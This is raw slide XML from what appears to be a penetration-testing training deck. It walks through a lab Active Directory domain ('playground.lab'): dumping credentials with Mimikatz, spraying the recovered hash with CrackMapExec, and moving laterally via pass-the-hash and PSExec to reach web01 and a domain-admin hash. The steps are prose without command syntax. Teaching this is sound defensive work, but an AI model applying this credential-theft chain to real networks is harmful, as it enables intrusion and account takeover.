              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr lang="en-US" sz="2400" b="0" i="0" kern="1200" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial Narrow" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="466725" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr lang="en-US" sz="2000" b="0" i="0" kern="1200" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial Narrow" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5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Dump credentials with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and discover another user, playground\brent hash. Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PowerView</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to see brent is part of the Local Admins domain group</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Oval 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB8FEE0C-A288-4E56-B0DB-BC8EAF4A2B72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5947479" y="3074439"/>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24" name="Rectangle 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DC158B7-970B-4200-8EF1-8ED38C9D6AFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2590803" y="3249427"/>
            <a:ext cx="2830036" cy="2990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459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307</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Step 3 – Use CME</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77010" y="3968079"/>
            <a:ext cx="1885881" cy="2045012"/>
            <a:chOff x="9020244" y="3623546"/>
            <a:chExt cx="1885881" cy="2045012"/>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77010" y="1258849"/>
            <a:ext cx="1885881" cy="2025133"/>
            <a:chOff x="9009288" y="1197713"/>
            <a:chExt cx="1885881" cy="2025133"/>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
        <p:nvSpPr>
          <p:cNvPr id="32" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{249D825F-BD1F-4A26-AEF3-AFC502F57F3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1866459" y="4671514"/>
            <a:ext cx="4483163" cy="1722081"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="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228600" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr lang="en-US" sz="2400" b="0" i="0" kern="1200" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial Narrow" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="466725" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr lang="en-US" sz="2000" b="0" i="0" kern="1200" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial Narrow" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5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From Kali, use CME to try the discovered hash against other targets in the domain. Discover it works on web01</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Oval 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB8FEE0C-A288-4E56-B0DB-BC8EAF4A2B72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9701526" y="4514782"/>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3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Rectangle 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C5E56DB-EF30-4538-A9E3-183221DFFA59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2590803" y="3249427"/>
            <a:ext cx="2830036" cy="2990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E0BE4EBB-A40B-406A-927A-6CB022B8443A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1850893">
            <a:off x="7064136" y="3974391"/>
            <a:ext cx="2280386" cy="4438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768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308</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Step 3 – Use CME</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77010" y="3968079"/>
            <a:ext cx="1885881" cy="2045012"/>
            <a:chOff x="9020244" y="3623546"/>
            <a:chExt cx="1885881" cy="2045012"/>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77010" y="1258849"/>
            <a:ext cx="1885881" cy="2025133"/>
            <a:chOff x="9009288" y="1197713"/>
            <a:chExt cx="1885881" cy="2025133"/>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
        <p:nvSpPr>
          <p:cNvPr id="32" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{249D825F-BD1F-4A26-AEF3-AFC502F57F3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666751" y="4671514"/>
            <a:ext cx="5682872" cy="1722081"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="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228600" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr lang="en-US" sz="2400" b="0" i="0" kern="1200" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial Narrow" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="466725" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr lang="en-US" sz="2000" b="0" i="0" kern="1200" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial Narrow" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> PTH + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PSExec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> from client01 and to get a shell on web01 and again use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, discover hash for playground\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>brent_da</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Oval 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB8FEE0C-A288-4E56-B0DB-BC8EAF4A2B72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9722704" y="4534661"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Arrow: Right 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9635D4A-BEA3-4865-9C9E-2F3CD3F4BDB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1850893">
            <a:off x="7064136" y="3974391"/>
            <a:ext cx="2280386" cy="4438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3DE32C2-8AFE-477D-A403-68FE27B4FF1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2590803" y="3249427"/>
            <a:ext cx="2830036" cy="2990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84759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83723-2991-4907-BD6A-B081164F707B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>309</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E696A254-5643-4F02-975B-4748176BD058}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Step 3 – Use CME</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Rectangle 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92E92891-9622-4AB3-888A-0029DE538B02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6276975" y="1019175"/>
            <a:ext cx="5501445" cy="5010150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">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7463743-6A84-4A19-AFB0-A8E1C4D45B65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5314594" y="2581275"/>
            <a:ext cx="1885950" cy="1885950"/>
            <a:chOff x="5314594" y="2581275"/>
            <a:chExt cx="1885950" cy="1885950"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="Rectangle 38">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B47A3AD8-C16C-4624-97BC-8A6800BCBBEA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5567831" y="2923993"/>
              <a:ext cx="1383644" cy="93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onitor with solid fill">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B53251E-3FE8-4E08-A157-15AF2D549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4594" y="2581275"/>
              <a:ext cx="1885950" cy="1885950"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="Graphic 25" descr="Monitor with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE4DE556-EBF1-4820-85D4-0B8B8A065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20" y="2581275"/>
            <a:ext cx="1885950" cy="1885950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95BCC99F-C0E5-45F2-9A73-E2BD3C664B07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="835423" y="2478643"/>
            <a:ext cx="1885949" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>172.16.100.129</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8ED02E0A-2CCF-4C71-AC00-A6E5F91F15D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1214096" y="4242637"/>
            <a:ext cx="1107996" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="TextBox 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4DBBD59-8E36-4797-9480-5F9F348739A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6266673" y="4242637"/>
            <a:ext cx="1043876" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>client01</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="47" name="Group 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{102CA24A-E59E-4D2A-B827-553FDDADF25E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9077010" y="3968079"/>
            <a:ext cx="1885881" cy="2045012"/>
            <a:chOff x="9020244" y="3623546"/>
            <a:chExt cx="1885881" cy="2045012"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="23" name="Graphic 22" descr="Server with solid fill">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0B67BBA-1F5A-4DB2-B1A5-D8C170CDB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0244" y="3623546"/>
              <a:ext cx="1885881" cy="1885882"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="TextBox 29">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD2D1DEB-F9C7-407C-BA2E-BE51278EB856}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9982694" y="5299226"/>
              <a:ext cx="889987" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>web01</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="38" name="Straight Connector 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDBB129F-0253-4CC0-B8B1-2C9B9DFAB107}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="26" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2711070" y="3524250"/>
            <a:ext cx="203238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117CDE1-9CA9-4321-8E58-24EDAB00B11B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9077010" y="1258849"/>
            <a:ext cx="1885881" cy="2025133"/>
            <a:chOff x="9009288" y="1197713"/>
            <a:chExt cx="1885881" cy="2025133"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="TextBox 30">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11498832-0F56-49BD-A655-D10AE777B9CE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10062102" y="2853514"/>
              <a:ext cx="582211" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>dc1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="42" name="Graphic 41" descr="Server with solid fill">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D6F698F-7260-4835-A5B5-AC581E34B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9288" y="1197713"/>
              <a:ext cx="1885881" cy="1885882"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="TextBox 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D4755ED-FDF2-4BC6-91AF-1976253BBF13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8105011" y="652094"/>
            <a:ext cx="1838965" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>playground.lab</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5">
                  <a:lumMod val="60000"/>
                  <a:lumOff val="40000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{249D825F-BD1F-4A26-AEF3-AFC502F57F3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="666751" y="4671514"/>
            <a:ext cx="5682872" cy="1722081"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="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228600" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr lang="en-US" sz="2400" b="0" i="0" kern="1200" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial Narrow" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="466725" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr lang="en-US" sz="2000" b="0" i="0" kern="1200" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial Narrow" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>impacket-psexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> from Kali with the </a:t>
            </a:r>
            <a:r>
